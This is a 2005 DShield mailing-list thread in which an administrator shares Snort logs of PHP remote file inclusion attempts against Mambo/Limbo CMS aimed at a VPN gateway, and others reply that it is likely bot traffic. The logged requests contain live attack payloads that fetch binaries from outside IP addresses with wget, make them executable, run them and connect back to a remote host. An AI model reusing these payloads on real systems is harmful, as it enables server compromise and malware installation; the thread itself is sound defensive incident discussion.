[Dshield] PHP injection attacks

Joel Esler eslerj at gmail.com
Thu Dec 22 12:42:46 GMT 2005


Agreed, most likely not vulernable, see the other post going on  
currently about "Can Someone Decipher This Log Entry", first know  
that you are not alone, and second, know that there about 20 variants  
of it.

J


On Dec 22, 2005, at 4:58 AM, Meidinger Chris wrote:

> Hi,
>
> This is the same thing David just asked about.
>
> It looks like you're right, that it's not mambo but limbo CMS.  
> Apparently they both use similar code or libraries.
>
> I can't imaging your VPN-Gateway being susceptible to the attacks  
> with or without patches. They seem to be for limbo running on  
> apache running on *nix. That is very unlikely to be a part of your  
> VPN setup.
>
> What does a packet dump show you? Is your box sending out 404's ??
>
> Cheers,
>
> Chris
>
> -----Original Message-----
> From: list-bounces at lists.dshield.org on behalf of  
> tfischer at oldenburggroup.com
> Sent: Thu 22-Dec-05 04:25
> To: list at lists.dshield.org
> Subject: [Dshield] PHP injection attacks
>
>
>    I have started to see exploit attempts against my VPN. I believe  
> I have
> identified them as:
>  FrSIRT advisory 12/15/05 - ADV-2005-2932  CVE-2005-4317 CVE-2005-4318
> CVE-2005-4319 CVE-2005-4320
>    I called my VPN vendor to see if they were susceptible to this  
> type of
> attack. They said that as long as I had the latest patches I should  
> be fine.
> I asked them why the device does not log the attempts. They said  
> they didn't
> know, but there was no need to worry as long as the patches were  
> in. The
> attacks are only being directed at this box. They come in sets of 5  
> or 6.
> There was one set Monday night, 6 yesterday and 50 so far today.  
> Does anyone
> know if this pattern has been automated and I'm just seeing some  
> bots out
> there searching? Anyone else seeing this?
>    Here are some of the SNORT logs:
>
> GET
> /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST 
> [option]=com_c
> ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:// 
> 81.174.26.
> 111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744% 
> 20listen;
> ./listen;echo%20YYY;echo|  HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 
> =1&GLOBALS=&m
> osConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/ 
> tmp;wget%2021
> 6.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|   
> HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 
> =1&GLOBALS=&mos
> Config_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/ 
> tmp;wget%20216.
> 15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|   
> HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 
> =1&GLOBAL
> S=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/ 
> tmp;wget%
> 20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST 
> [option]=com_
> content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:// 
> 200.72.13
> 0.29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744% 
> 20sexy;./
> sexy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST 
> [option]=com_c
> ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:// 
> 200.72.130
> .29/cmd.gif?&cmd=cd%20/tmp;wget%2066.235.205.212/sexy;chmod%20744% 
> 20sexy;./s
> exy%20200.60.149.19%208080;00;echo%20YYY;echo|  HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 
> =1&GLOBALS=&m
> osConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/ 
> tmp;wget%2066
> .235.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19% 
> 208080;00;echo%2
> 0YYY;echo|  HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
> GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] 
> =1&GLOBALS=&mos
> Config_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/ 
> tmp;wget%2066.2
> 35.205.212/sexy;chmod%20744%20sexy;./sexy%20200.60.149.19% 
> 208080;00;echo%20Y
> YY;echo|  HTTP/1.1
> Host: my.ip.address
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
>
>
>
> _________________________________________
> Learn about Intrusion Detection in Depth from the comfort of your  
> own couch:
> https://www.sans.org/athome/details.php?id=1341&d=1
>
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http:// 
> www.dshield.org/mailman/listinfo/list
>
> _________________________________________
> Learn about Intrusion Detection in Depth from the comfort of your  
> own couch:
> https://www.sans.org/athome/details.php?id=1341&d=1
>
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http:// 
> www.dshield.org/mailman/listinfo/list



More information about the list mailing list